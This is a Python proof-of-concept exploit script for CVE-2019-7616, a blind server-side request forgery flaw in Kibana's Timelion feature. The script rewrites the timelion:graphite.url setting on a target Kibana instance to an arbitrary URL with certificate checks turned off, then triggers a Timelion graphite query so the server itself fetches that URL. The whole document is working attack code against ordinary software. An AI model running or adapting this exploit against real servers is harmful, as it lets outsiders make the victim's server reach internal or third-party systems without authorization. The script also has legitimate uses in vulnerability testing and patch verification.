import requests
import sys
session = requests.Session()
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# CVE-2019-7616 - ESA-2019-09 - POC by @random_robbie - BLIND SSRF

SSRF_URL = "https://demo.goharbor.io/api/v2.0/systeminfo"
KIBANA_URL = "http://YOURKIBANA"

rawBody = "{\"changes\":{\"timelion:graphite.url\":\""+SSRF_URL+"\"}}"
headers = {"Origin":""+KIBANA_URL+"","Accept":"application/json","kbn-version":"6.7.0","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0","Referer":""+KIBANA_URL+"/_plugin/kibana/app/kibana","Connection":"close","content-type":"application/json","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
response = session.post(""+KIBANA_URL+"/_plugin/kibana/api/kibana/settings", data=rawBody, headers=headers,verify=False)

if response.status_code == 200:
	print("Response body: %s" % response.content)
else:
	print("Response body: %s" % response.content)
	sys.exit(0)



rawBody2 = "{\"sheet\":[\".graphite()\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"1s\",\"timezone\":\"Europe/London\"}}"
headers2 = {"Origin":""+KIBANA_URL+"","Accept":"application/json, text/plain, */*","kbn-version":"6.7.0","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":""+KIBANA_URL+"/_plugin/kibana/app/timelion","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/json;charset=utf-8"}
response2 = session.post(""+KIBANA_URL+"/_plugin/kibana/api/timelion/run", data=rawBody2, headers=headers2,verify=False)
print("Response body: %s" % response2.content)